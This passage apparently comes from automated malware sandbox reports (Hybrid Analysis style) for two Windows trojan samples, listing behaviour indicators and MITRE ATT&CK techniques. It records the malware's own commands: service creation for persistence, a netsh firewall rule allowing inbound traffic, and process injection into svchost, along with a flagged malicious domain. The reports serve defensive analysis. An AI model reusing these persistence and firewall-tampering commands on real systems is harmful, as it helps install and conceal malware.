AUTHORITY\"\n \"cchReferencedDomainName\": \"0c000000\"\n \"peUse\": \"05000000\"}", "origin": "API Call", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\System32\\cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\egzkrznd.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004000)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (UID: 00000000-00005872)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004004)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\egzkrznd.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004000)\n Spawned process \"sc.exe\" with commandline \"create zvdnuoqu binPath= \"%WINDIR%\\\\system32\\\\zvdnuoqu\\\\egzkrznd.exe /d\\\\\"C:\\\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00006044)\n Spawned process \"sc.exe\" with commandline \"description zvdnuoqu \"wifi internet conection\"\" (UID: 00000000-00004236)\n Spawned process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004152)\n Spawned process \"egzkrznd.exe\" with commandline \"/d\"C:\\\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\"\" (UID: 00000000-00001396)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003360)\n Spawned process \"svchost.exe\" (UID: 00000000-00003900)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 576)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 576)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 576)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 156)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 156)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 156)\n \"egzkrznd.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"egzkrznd.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"egzkrznd.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"egzkrznd.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" allocated memory in \"C:\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"egzkrznd.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00001396)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"egzkrznd.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004152)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003360)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774
https://hybrid-analysis.com/sample/b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774
Hybrid Analysis - Um_unhooking
{"size": 366592, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774", "sha256": "b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774", "av_detect": 81, "vx_family": "Trojan.Injuke", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 115, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 30148)", "1 Unknown Resource Files (build: 0)", "1 Unknown Objects (build: 30148)", "2 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 30148)"], "imported_objects": ["20 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 30034)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30034)", "38 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30034)", "20 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30795)", "143 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30795)", "10 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 30795)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (2 files)"], "total_file_compositions_imports": 13}, "processes": [{"uid": "00000000-00005988", "name": "b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe", "normalized_path": "C:\\b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe", "sha256": "b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774", "av_label": "Trojan.Llac", "av_matched": 1, "av_total": 14}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": 